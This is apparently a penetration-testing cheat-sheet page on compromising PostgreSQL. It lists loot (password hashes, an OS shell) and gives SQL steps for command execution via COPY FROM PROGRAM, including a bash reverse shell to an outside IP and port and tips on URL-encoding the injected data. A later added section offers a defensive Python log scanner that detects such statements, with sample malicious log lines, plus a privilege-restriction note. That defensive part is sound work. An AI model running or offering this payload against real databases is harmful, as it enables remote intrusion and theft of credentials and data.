
PostgreSQL


Last updated 2 years ago


Compromising DB - [sqlmap code]:

Properties:

  • Nested queries: query1;query2;...

  • Interact with the DB via the command line: psql (quit: \q)

  • Loot:
    1. DBMS version
    2. Database content
    3. DBMS users' password hashes
    4. OS shell

OS Shell [ v9.3–v14 ]:

  1. DROP TABLE IF EXISTS cmd_exec;
  2. CREATE TABLE cmd_exec(cmd_output text);
  3. COPY cmd_exec FROM PROGRAM '<cmd>'

For example:

COPY cmd_exec FROM PROGRAM 'bash -c "/bin/bash -l > /dev/tcp/10.10.14.12/7909 0<&1 2>&1"'

Note: single quotes are needed around the command. URL-encode the whole POST/GET data.
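The detection side of the steps above, as an added example that is not from the original page or from sqlmap: a log scanner that flags `COPY ... FROM PROGRAM` even when it arrives URL-encoded, comment-split, or as a stacked query. It assumes web access logs or PostgreSQL statement logs (`log_statement` enabled) are available; the function names and sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

_BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.S)
# COPY <table> [(cols)] FROM PROGRAM ['<cmd>']; the quoted command is optional so that
# dollar-quoted commands are still flagged (their text is just not captured).
_COPY_PROGRAM = re.compile(
    r"""\bcopy\s+("[^"]+"|[\w.]+)\s*(?:\([^)]*\)\s*)?from\s+program\b\s*(?:e?'((?:[^']|'')*)')?""",
    re.I,
)

def normalise(line):
    """Undo up to three layers of URL encoding, then drop /* */ comments and extra spaces."""
    for _ in range(3):
        decoded = unquote_plus(line)
        if decoded == line:
            break
        line = decoded
    line = _BLOCK_COMMENT.sub(" ", line)
    return re.sub(r"\s+", " ", line)

def find_copy_program(line):
    """Return table, command and stacked-query flag for a log line, or None if clean."""
    text = normalise(line)
    m = _COPY_PROGRAM.search(text)
    if m is None:
        return None
    return {
        "table": m.group(1),
        "command": m.group(2),
        # True when the statement directly follows ';' (query1;query2 injection)
        "stacked": text[: m.start()].rstrip().endswith(";"),
    }

# Constructed sample lines: web access log, PostgreSQL statement log, benign COPY.
SAMPLE_LOGS = [
    '192.0.2.10 - - [01/Jan/2024:00:00:00 +0000] "GET /item?id=1%3BCOPY%20cmd_exec'
    '%20FROM%20PROGRAM%20%27id%27 HTTP/1.1" 200 512',
    "2024-01-01 00:00:01 UTC [4242] LOG:  statement: copy/**/cmd_exec/**/from/**/program 'id'",
    "2024-01-01 00:00:05 UTC [4242] LOG:  statement: COPY orders FROM '/tmp/orders.csv'",
]

def scan(lines):
    """Return (line_number, finding) pairs for every flagged line."""
    return [(i, f) for i, line in enumerate(lines, 1) if (f := find_copy_program(line))]

if __name__ == "__main__":
    for number, finding in scan(SAMPLE_LOGS):
        print(number, finding)
```

On the database side, `COPY ... FROM PROGRAM` is limited to superusers and, from PostgreSQL 11, members of `pg_execute_server_program`, so an application role holding neither cannot run step 3.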

https://github.com/sqlmapproject/sqlmap/blob/582bb2fec960db825478a54c0aabbd7ba551f1b8/plugins/dbms/postgresql/takeover.py